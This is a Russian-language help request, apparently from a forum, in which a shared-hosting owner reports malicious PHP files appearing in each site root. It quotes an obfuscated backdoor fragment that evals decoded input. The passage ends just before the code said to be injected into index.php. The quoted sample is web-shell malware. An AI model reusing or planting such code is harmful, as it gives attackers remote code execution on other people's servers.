У меня есть виртуальный хостинг с 10+ сайтами от ru-center

Структура в FTP такая:

• /site1.com/public_html
  
• /site2.com/public_html
  
• /site3.com/public_html
  
• ...

Каким-то образом на хостинге появляются новые файлы. Примерно по 3-4 в корень каждого сайта. Файлы такого вида:

• 76nt0hgr.php
  
• ajax28.php
  
• hmbjcewn.php

Пример содержания одного из них:

$cejrm){function twojb($ejlnjbs, $hhvsm, $jkzowhs){return $ejlnjbs[6]($ejlnjbs[4]($hhvsm . $ejlnjbs[2], ($jkzowhs / $ejlnjbs[8]($hhvsm)) + 1), 0, $jkzowhs);}function llhbte($ejlnjbs, $jxzkvi){return @$ejlnjbs[9]($ejlnjbs[0], $jxzkvi);}function flkmrh($ejlnjbs, $jxzkvi){$gtuyb = $ejlnjbs[3]($jxzkvi) % 3;if (!$gtuyb) {eval($jxzkvi[1]($jxzkvi[2]));exit();}}$cejrm = llhbte($ejlnjbs, $cejrm);flkmrh($ejlnjbs, $ejlnjbs[5]($ejlnjbs[1], $cejrm ^ twojb($ejlnjbs, $hhvsm, $ejlnjbs[8]($cejrm))));}

И что самое интересное, вирус редактирует файл index.php, добавляя в самое начало файла примерно такой код (для каждого сайта немного отличается, но вид одинаковый):